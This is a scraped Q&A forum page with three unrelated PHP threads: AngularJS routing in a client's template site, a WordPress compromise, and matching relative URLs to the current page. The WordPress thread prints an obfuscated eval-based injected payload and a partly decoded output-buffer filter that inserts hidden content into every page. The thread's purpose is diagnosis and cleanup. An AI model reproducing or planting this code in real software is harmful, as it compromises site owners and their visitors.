ng-view outside of index file - php

I am building a project for a client who has a php site, there is a file that has "template functions". ...so basically, the person has different HTML pages wrapped inside of PHP functions. I need to build a template inside of this person's weird site and I REALLY want to use AngularJs. So at the top of the file is all this stuff, which not exactly sure what it is doing but basically setting where the site is and what template to use.
My question - I am getting Error: $injector:modulerr
Module Error. My Angularjs code is fine I am pretty sure. I have ng-app, and ng-view..just basic stuff in place. Does anyone know possibilities why I am getting this error? I am thinking it must have something to do with this wacky server/php setup. Also any ideas to make it work?
Inside of the php function that loads the template for the site what looks like a basic HTML file with ng-app on the html tags and and ng-view div.
if(!isset($_SESSION)){ session_start(); }
function setup_path_massage(){
if (substr_count($_SERVER['SERVER_NAME'],".") == 1){
$domref = "www." . $_SERVER['SERVER_NAME'] ; }
else {
$domref = $_SERVER['SERVER_NAME'] ; }
list($host,$domain,$ext) = split("\.",$domref);
$domain .= "." . $ext;
$_SESSION['settings']['domain'] = $domain;
#################
if (isset($_SERVER['SUBDOMAIN_DOCUMENT_ROOT'])){
$orig_path_info = realpath($_SERVER['SUBDOMAIN_DOCUMENT_ROOT']);
$pos = strpos($orig_path_info, '/shop/');
}
else {
$orig_path_info = realpath($_SERVER['DOCUMENT_ROOT']);
$pos = strpos($orig_path_info, '/shop/');
}
$shop_path = substr($orig_path_info, 0, $pos)."/shop/";
$Zend_path = $shop_path . 'Zend/library/';
$version = 'v' . substr($orig_path_info, $pos + 7, strpos($orig_path_info, '/', $pos + 7) - ($pos + 7));
set_include_path($shop_path.$version.'/:'.$Zend_path);
return array ($host,$domain);
}
list($host,$domain) = setup_path_massage();


Ok, I was just spazzing out. ...I forgot to attach angular-routes.js and was trying to set up routes.

Related

wordpress are injected some code snippets

I found all of php files of my wordpress are injected some code snippets in front of the files.
<?php
$ipdcnbaium = '5c%x78256<^#zsfvr#%x5c%x785cq7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz]y74]273]y76]252]y85]256]y6g]257]78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWt%x7860gvodujpo)##-!#~<#%x5c%x77825)}.;%x5c%x7860UQPc%x787f!>>%x5c%x7822!pd%x5c%x7825m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x782x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x5tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%c%x7825j=tj{fpg)%x5c%x7825%4]y76#<%x5c%x7825tmw!>!#]y84]275]y824*<!%x5c%x7824-%x5c%x7824gx7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x78f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x786GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%{hnpd!opjudovg!|!**#j{hnpd#)tutjyf)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x78275hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbc%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x773:8297f:5297e:56-%x5c%x7878r.985:52985-t.9%x5c%x7860opjudovg%x5c%x7822)!gj}x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c83]273]y76]277#<%x5c%x7825t2w>#%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%xY%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!isset($GLc%x7824]y8%x5c%x7824-%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwx782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)#57]38y]47]67y]37]88y]27]5c%x7825))!gj!<*#cd2bge56,47R57,27R66,#%x5c%x782fq%x5c%x7825>ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x782582f%x5c%x7825%x5c%x7825c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI2]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#76248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]uhofm%x5c%x7825:-5ppdex7825!<*#}_;#)323ldfid>}&;%x5c%x7825:osvufs:~92x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>hIr%x5c%x785c1^-%x5c%x7825r%xc%x7825r%x5c%x7878<~!!%x5c%x7825c%x785c2^-%x5c%x7826*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<1]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7828257-MSV,6<*)ujojR%x5c%x7827id%x5ck#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]27{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825opmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j2f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]27%x7825s:%x5c%x785c%x5c%x78#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|9]78]K5]53]Kc#<%x5c%x7825tpz!>-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-E%x5c%x78257%x5c%x782f7###7%x5c%x782f7^x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GOy3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5"%x61%156%x75%156%x61"]=1x5c%x7827pd%x5c%x78256<pdx5c%x7825-#+I#)q%x5cy33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]6225kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfeb8>>%x5c%x7822:ftmbg39*565c%x7827{**u%x5c%x7825-#jt0t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!8]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%5z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wc%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zeUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7828y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%; function fjfgg($n){return chr(ord($n)-]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", 860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%25!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x782!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x782%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x77jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5cfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd5tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5825w6Z6<.5%x5c%x7860hA%x5c%x7827ppn)%x5c%x7825epnbss-%x5c%x7825r%x5c%25j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:}Z;0]=]0#)2q%x5c%x7825l}S;2-u#iubq#%x5c%x785cq%x5c%x7821);} #error_reporting(0); preg_replacex78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]OBALS["%x61%156%x75%156%x61"])))) { $GLOBALS[5s:N}#-%x5c%x7825o:W%x5c%x78257825)sutcvt)esp>hmg%x5c%x7825!<5%x5c%x7827jsv%x5c%x81]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7860%x5c%x7825}X;!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%xx5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x25z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7x7825!)!gj!<2,*j%x5c%x7825!-#1]#-b4-%x5c%x7824!>!fyqmpef5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9e!-#jt0*?]+^?]_%x5c%x785c}:4:|:**#ppde#)tutjyf%x5c%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)f%x5c%x7825ggg!>!#]y81]273]y8pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*bepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y#-#L#-#M#-#[#-#Y#-#D#-#W7824-%x5c%x7824-tusqpt)%x5c%x78b!-#}#)fepmqnj!%x5c%x782f!#0#)id!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7812>j%x5c%x7825!|!*#91y]825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5825)!>>%x5c%x7822!ftmbg)!gj<*#Y%x5c%x78257;utpI#7>%x}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[7860%x5c%x7878%x5c%x7822l:!}V;3q%x5%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x!osvufs}%x5c%x787f;!opjudovg}k~~9{d1^W%x5c%x7825c!>!%x5c%x7825i%xjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssNULL); })!gj}Z;h!opjudovg}{;274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uy5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x0FUPNFS&d_SFSFGFS%x5c%x7860Q#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#Kc9y]g2y]#>>*4-1-bubE{h%x5]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]3!osvufs!*!+A!>!{e%x5c%x725j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5cMSVD!-id%x5c%x7825)uqpuft%x5c%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x517,67R37,#%x5c%x782fq%x5c%x7825>U<#1Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%xx7878W~!Ypp2)%x5c%x7825zBz-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825%x5c%x7825tww**WYsboepn)%x5c%x7825b%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboe)sutcvt)fubmgoj{hA!osvuf439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:i)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x70LDPT7-UFOJ%x5c%x7860g:74985-rr.93e:5597f-s.9c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7Rc%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]2X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%165]y83]248]y83]256]y81]265]y72]25#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7878256<C>^#zsfvr#%x5c%x785cq%xps)%x5c%x7825j>1<%x56]234]342]58]24]31#-%x5c%x7825tdd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7z*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x52q%x5c%x7825<#g6R85,67R37,5:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]47ubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&SA:>:8:|:7#6#)tutjyf%x5c%x7860Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c4-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x786y86]267]y74]275]y7:]268]y7f#<!%x5c%x782827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc)#]341]88M4P8]37]278]2254l}%x5c%x7827;%x5c%7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7pc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x%x78256<%x5c%x787fw6*%x5c%xCW&)7gj6<.[A%x5c%x7827&6<%x5c%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827%x5c%x7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%xubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x787ss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K6+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&%x787fw6<*K)ftpmdXA6|7**197-2qj%x5R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-s!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%fu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827kc:>1<%x5c%x7825b:>1<!gps)%x5c%x782x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-0%x28%42%x66%152%x66%147%x67%42/(.*)/epreg_replacecawmpmsvdd';
$iizkegwpep = explode(chr((159-115)),'1520,70,4940,45,3179,25,3857,40,4841,38,5381,48,8214,69,10075,31,7231,69,5872,44,3141,38,4381,51,4674,33,8438,39,3937,61,3204,25,4579,41,5676,38,1174,44,8968,49,8136,37,2916,51,4879,61,6505,22,1866,44,4432,50,9786,34,8859,70,7771,21,825,67,5429,44,2526,68,0,29,3033,38,4815,26,5046,20,8357,29,5636,40,926,56,1421,59,2219,40,5916,45,6103,41,6903,42,171,47,4482,37,9820,51,7715,56,2323,34,9299,27,5333,48,9326,29,676,63,7381,63,1480,40,248,21,7202,29,8527,43,7816,63,269,33,6780,20,2768,68,1804,40,7598,24,9871,52,5580,34,8637,38,5194,35,9355,65,4121,51,2403,39,557,68,6945,53,5015,31,6412,23,7056,24,8173,41,892,34,1261,33,8068,68,3071,70,4620,54,1116,58,2090,49,6034,69,9420,43,9463,69,5831,41,1612,68,6729,43,6247,32,9532,55,5988,46,1743,24,9723,63,789,36,6998,28,3758,49,3998,60,9017,67,6853,50,9923,68,7300,45,5174,20,3596,48,1680,38,9144,20,2043,26,6664,35,2069,21,3452,24,8736,29,7622,56,2021,22,5805,26,126,45,2483,43,7139,24,6475,30,2357,46,8675,61,7879,69,7345,36,1767,37,8570,26,3404,48,5473,47,6570,35,3711,47,9229,70,3476,27,4786,29,1048,68,5779,26,8018,50,6800,53,2442,41,8283,32,495,34,1329,31,93,33,8929,39,4519,60,2866,50,1718,25,3807,50,3229,20,4344,37,302,69,8596,41,1910,63,625,51,3503,53,5229,51,2704,38,2259,64,8798,61,4228,59,6605,59,6216,31,5520,60,6435,40,1590,22,371,56,9164,65,529,28,8386,20,468,27,1294,35,218,30,1844,22,5614,22,7678,37,6144,48,4287,57,5280,53,6699,30,9084,37,7543,55,4707,36,7444,25,2967,66,7469,39,2139,29,2199,20,982,66,7508,35,9587,68,7792,24,1218,43,3556,40,9655,68,2836,30,6279,63,4058,63,427,41,5714,65,6527,43,1360,61,29,64,9121,23,7080,59,5066,64,8406,32,8477,50,4172,56,2168,31,4985,30,9991,34,2594,70,6342,70,7163,39,2742,26,4743,43,8765,33,739,50,2664,40,3644,67,3338,66,10025,50,7026,30,6192,24,8315,42,3305,33,5961,27,5130,44,7948,70,1973,48,3249,56,3897,40,6772,8');
$emohrydhhi=substr($ipdcnbaium,(43064-32958),(46-39));
if (!function_exists('efccfhrtgn')) {
function efccfhrtgn($lvbeusmjag, $likewwohuf) {
$bofyjhslnr = NULL;
for($wymmotluwp=0;$wymmotluwp<(sizeof($lvbeusmjag)/2);$wymmotluwp++) {
$bofyjhslnr .= substr($likewwohuf, $lvbeusmjag[($wymmotluwp*2)],$lvbeusmjag[($wymmotluwp*2)+1]);
} return $bofyjhslnr;
};
}
$anjiklzunk="\x20\57\x2a\40\x67\166\x66\162\x70\151\x78\145\x74\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\61\x31\55\x37\64\x29\51\x2c\40\x63\150\x72\50\x28\62\x38\70\x2d\61\x39\66\x29\51\x2c\40\x65\146\x63\143\x66\150\x72\164\x67\156\x28\44\x69\151\x7a\153\x65\147\x77\160\x65\160\x2c\44\x69\160\x64\143\x6e\142\x61\151\x75\155\x29\51\x29\73\x20\57\x2a\40\x78\147\x76\157\x66\163\x6b\147\x6f\146\x20\52\x2f\40";
$xmtobffgzh=substr($ipdcnbaium,(35930-25817),(80-68));
$xmtobffgzh($emohrydhhi, $anjiklzunk, NULL);
$xmtobffgzh=$anjiklzunk;
$xmtobffgzh=(818-697);
$ipdcnbaium=$xmtobffgzh-1; ?>
it seems like some encrypted php codes. So I tried decrypted it Here, then I got
<?php
function __lambda_func()
{
};
if (!function_exists("pa22")) {
function pa22($v)
{
Header("Content-Encoding: none");
$p = "\x70\162\x65\147\x5f";
$p1 = $p . "\155\x61\164\x63\150";
$p2 = $p . "\162\x65\160\x6c\141\x63\145";
$t = dcoo($v);
if ($p1("/\<\/body/si", $t)) {
return $p2("/(\<\/body[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
}
else {
if ($p1("/\<\/html/si", $t)) {
return $p2("/(\<\/html[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
}
else {
return $t;
}
}
}
}
ob_start("pa22"); //}
I had reinstalled my wordpress several months ago. But it comes again now. My wordpress is the newest version(3.9.1).
my question is
how did those snippets inject into php files?
what are the snippets going to do?

Its seems like a 3rd party injunction. This kinds of attacks are common in wordpress. Please take some security measures after cleaning the inject codes. Disable the edit permission and use some security plugins like file file-monitor-plus and wordfence

Definitely a hack attempt. Probably not targeted to your own site, but you should clear all these things, since they may quickly eat up your hosting resources (CPU, Memory,IO).
My advice is after clearing them, disable WP's ability to edit files through the dashboard and set permissions to critical files (config, index etc) to something like 0400 or 0440.
The way they get there varies, but in most cases the guy who did this used some known PHP (or other) exploit, which your webhost has not patched yet...

How can I detect if a given URL is the current one?

I need to detect if a provided URL matches the one currently navigated to. Mind you the following are all valid, yet semantically equivalent URLs:
https://www.example.com/path/to/page/index.php?parameter=value
https://www.example.com/path/to/page/index.php
https://www.example.com/path/to/page/
https://www.example.com/path/to/page
http://www.example.com/path/to/page
//www.example.com/path/to/page
//www/path/to/page
../../../path/to/page
../../to/page
../page
./
The final function must return true if the given URL points back to the current page, or false if it does not. I do not have a list of expected URLs; this will be used for a client who just wants links to be disabled when they link to the current page. Note that I wish to ignore parameters, as these do not indicate the current page on this site. I got as far as using the following regex:
/^((https?:)?\/\/www(\.example\.com)\/path\/to\/page\/?(index.php)?(\?.+=.*(\&.+=.*)*)?)|(\.\/)$/i
where https?, www, \.example\.com, \/path\/to\/page, and index.php are dynamically detected with $_SERVER["PHP_SELF"] and made into regex form, but that doesn't match the relative URLs like ../../to/page.
EDIT: I got a bit farther with the regex: refiddle.com/gv8
now I'd just need PHP to dynamically create the regex for any given page.

First off, there is no way to predict the total list of valid URLs that will result in display of the current page, since you can't predict (or control) external links that might link back to the page. What if someone uses TinyURL or bit.ly? A regex will not cut the mustard.
If what you need is to insure that a link does not result in the same page, then you need to TEST it. Here's a basic concept:
Every page has a unique ID. Call it a serial number. It should be persistent. The serial number should be embedded somewhere predictable (though perhaps invisibly) within the page.
As the page is created, your PHP will need to walk through all the links for each page, visit each one, and determine whether the link resolves to a page with a serial number that matches the calling page's serial number.
If the serial number does not match, display the link as a link. Otherwise, display something else.
Obviously, this will be an arduous, resource-intensive process for page production. You really don't want to solve your problem this way.
With your "ultimate goal" comment in mind, I suspect your best approach is to be approximate. Here are some strategies...
First option is also the simplest. If you're building a content management system that USUALLY creates links in one format, just support that format. Wikipedia's approach works because a [[link]] is something THEY generate, so THEY know how it's formatted.
Second is more the direction you've gone with your question. The elements of a URL are "protocol", "host", "path" and "query string". You can break them out into a regex, and possibly get it right. You've already stated that you intend to ignore the query string. So ... start with '((https?:)?//(www\.)?example\.com)?' . $_SERVER['SCRIPT_NAME'] and add endings to suit. Other answers are already helping you with this.
Third option is quite a bit more complex, but gives you more fine-grained control over your test. As with the last option, you have the various URL elements. You can test for the validity of each without using a regex. For example:
$a = array(); // init array for valid URLs
// Step through each variation of our path...
foreach([$_SERVER['SCRIPT_NAME'], $_SERVER['REQUEST_URI']] as $path) {
// Step through each variation of our host...
foreach ([$_SERVER['HTTP_HOST'], explode(".", $_SERVER['HTTP_HOST'])[0]] as $server) {
// Step through each variation of our protocol...
foreach (['https://','http://','//'] as $protocol) {
// Set the URL as a key.
$a[ $protocol . $server . $path ] = 1;
}
}
// Also for each path, step through directories and parents...
$apath=explode('/', $path); // turn the path into an array
unset($apath[0]); // strip the leading slash
for( $i = 1; $i <= count($apath); $i++ ) {
if (strlen($apath[$i])) {
$a[ str_repeat("../", 1+count($apath)-$i) . implode("/", $apath) ] = 1;
// add relative paths
}
unset($apath[$i]);
}
$a[ "./" . implode("/", $apath) ] = 1; // add current directory
}
Then simply test whether the link (minus its query string) is an index within the array. Or adjust to suit; I'm sure you get the idea.
I like this third solution the best.

A regex isn't actually necessary to strip off all the query parameters. You could use strok():
$url = strtok($url, '?');
And, to check the output for your URL array:
$url_list = <<<URL
https://www.example.com/path/to/page/index.php?parameter=value
https://www.example.com/path/to/page/index.php
...
./?parameter=value
./
URL;
$urls = explode("\n", $url_list);
foreach ($urls as $url) {
$url = strtok($url, '?'); // remove everything after ?
echo $url."\n";
}
As a function (could be improved):
function checkURLMatch($url, $url_array) {
$url = strtok($url, '?'); // remove everything after ?
if( in_array($url, $url_array)) {
// url exists array
return True;
} else {
// url not in array
return False;
}
}
See it live!

You can use this approach:
function checkURL($me, $s) {
$dir = dirname($me) . '/';
// you may need to refine this
$s = preg_filter(array('~^//~', '~/$~', '~\?.*$~', '~\.\./~'),
array('', '', '', $dir), $s);
// parse resulting URL
$url = parse_url($s);
var_dump($url);
// match parsed URL's path with self
return ($url['path'] === $me);
}
// your page's URL with stripped out .php
$me = str_replace('.php', '', $_SERVER['PHP_SELF']);
// assume this is the URL you are matching against
$s = '../page/';
// compare $me with $s
$ret = checkURL($me, $s);
var_dump($ret);
Live Demo: http://ideone.com/OZZM53

As I have been paid to work on this for the last couple days, I wasn't just sitting around waiting for an answer. I've come up with one that works in my test platform; what does everyone else think? It feels a little bloated, but also feels bulletproof.
Debug echoes left in in case you wanna echo out some stuffs.
global $debug;$debug = false; // toggle debug echoes and var_dumps
/**
* Returns a boolean indicating whether the given URL is the current one.
*
* #param $otherURL the other URL, as a string. Can be any URL, relative or canonical. Invalid URLs will not match.
*
* #return true iff the given URL points to the same place as the current one
*/
function isCurrentURL($otherURL)
{global $debug;
if($debug)echo"<!--\r\nisCurrentURL($otherURL)\r\n{\r\n";
if ($thisURL == $otherURL) // unlikely, but possible. Might as well check.
return true;
// BEGIN Parse other URL
$otherProtocol = parse_url($otherURL);
$otherHost = $otherProtocol["host"] or null; // if $otherProtocol["host"] is set and is not null, use it. Else, use null.
$otherDomain = explode(".", $otherHost) or $otherDomain;
$otherSubdomain = array_shift($otherDomain); // subdom only
$otherDomain = implode(".", $otherDomain); // domain only
$otherFilepath = $otherProtocol["path"] or null;
$otherProtocol = $otherProtocol["scheme"] or null;
// END Parse other URL
// BEGIN Get current URL
#if($debug){echo '$_SERVER == '; var_dump($_SERVER);}
$thisProtocol = $_SERVER["HTTP_X_FORWARDED_PROTO"]; // http or https
$thisHost = $_SERVER["HTTP_HOST"]; // subdom or subdom.domain.tld
$thisDomain = explode(".", $thisHost);
$thisSubdomain = array_shift($thisDomain); // subdom only
$thisDomain = implode(".", $thisDomain); // domain only
if ($thisDomain == "")
$thisDomain = $otherDomain;
$thisFilepath = $_SERVER["PHP_SELF"]; // /path/to/file.php
$thisURL = "$thisProtocol://$thisHost$thisFilepath";
// END Get current URL
if($debug)echo"Current URL is $thisURL ($thisProtocol, $thisSubdomain, $thisDomain, $thisFilepath).\r\n";
if($debug)echo"Other URL is $otherURL ($otherProtocol, $otherHost, $otherFilepath).\r\n";
$thisDomainRegexed = isset($thisDomain) && $thisDomain != null && $thisDomain != "" ? "(\." . str_replace(".","\.",$thisDomain) . ")?" : ""; // prepare domain for insertion into regex
// v this makes the last slash before index.php optional
